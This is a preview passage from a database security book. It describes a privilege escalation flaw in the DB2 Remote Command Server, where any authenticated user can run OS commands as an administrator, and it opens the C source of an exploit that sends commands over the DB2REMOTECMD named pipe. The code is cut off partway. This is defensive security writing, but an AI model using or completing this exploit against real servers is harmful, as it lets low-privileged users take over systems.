DB2 Remote Command Server
The DB2 Remote Command Server exists to ease administration of the DB2 server allowing users to run arbitrary commands on the remote server. Although the Remote Command Server was intended to allow administrators to run commands, commands can be run by any user, provided of course they have a user ID and password. While it is considered bad to allow everyone and their dog to run commands remotely, what exacerbates the problem is that the command runs with the privileges of the user account running the Remote Command Server. On Windows, for example, this is db2admin, which is an administrator. What this means is that a low-privileged guest account can run OS commands with administrator-level privileges.
/* DB2 Remote Command Server Exploit
DB2RCMD.EXE listens on a named pipe DB2REMOTECMD and executes commands sent through it. When a connection is made to the pipe a new process is created, namely db2rcmdc.exe, and this executes the command.
*/ #include <stdio.h> #include <windows.h> int main(int argc, char *argv[]) { char buffer[540]=""; char NamedPipe[260]="\\\\"; HANDLE rcmd=NULL; char *ptr = NULL; int len =0; DWORD Bytes = 0; if(argc !=3) { printf("\n\tDB2 Remote Command Exploit.\n\n"); printf("\tUsage: db2rmtcmd target \"command\"\n"); printf("\n\tDavid Litchfield\n\t(david@ngssoftware.com)\n\t6th September 2003\n"); return 0; } strncat(NamedPipe,argv[1],200); strcat(NamedPipe,"\\pipe\\DB2REMOTECMD"); // Setup handshake message ZeroMemory(buffer,540); ...Get The Database Hacker's Handbook: Defending Database Servers now with the O’Reilly learning platform.
O’Reilly members experience books, live events, courses curated by job role, and more from O’Reilly and nearly 200 top publishers.
